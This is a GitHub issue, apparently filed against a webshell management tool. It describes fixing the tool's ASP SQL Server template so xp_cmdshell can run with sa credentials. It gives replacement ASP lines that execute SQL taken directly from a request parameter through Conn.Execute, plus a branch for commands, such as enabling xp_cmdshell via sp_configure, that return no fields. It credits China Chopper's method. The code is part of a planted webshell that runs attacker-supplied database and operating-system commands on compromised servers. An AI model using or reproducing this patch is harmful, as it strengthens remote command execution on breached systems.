ASP连SQLSERVER执行xp_cmdshell爆 驱动程序不支持所需的属性 解决办法 #239
Labels
🤝Welcome PR
欢迎对该问题提PR
Comments
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
使用ASP连接SQLSERVER sa执行xp_cmdshell爆“-2147217887:ODBC 驱动程序不支持所需的属性错误”。
原因是在source\core\asp\template\database\sqlserver.js中执行SQL语句代码模板中使用Recordset对象的open方法来执行SQL语句,貌似是该方法不支持请求xp_cmdshell这种过程对象,具体我也不清楚,这里参考了下菜刀的方式解决。
删除102、103行代码
Set Rs=CreateObject("Adodb.Recordset"): Rs.open ""&bd(Request("${arg2}"))&"",Conn,1,1:更改为Connection对象的Execute方法直接执行
Set Rs=Conn.Execute(""&bd(Request("${arg2}"))&""):为了防止执行一些返回recordset.Fields为0的命令(如开启xp_cmdshell的命令:EXEC sp_configure "show advanced options",1)后面程序进入死循环的情况,这里还需要加一个if判断:
在
FN=Rs.Fields.Count-1:的后面添加If FN=-1 Then: Response.Write HD&"Execute Successfully!"&CO&RN: Else:再在
loop后面添加End If:The text was updated successfully, but these errors were encountered: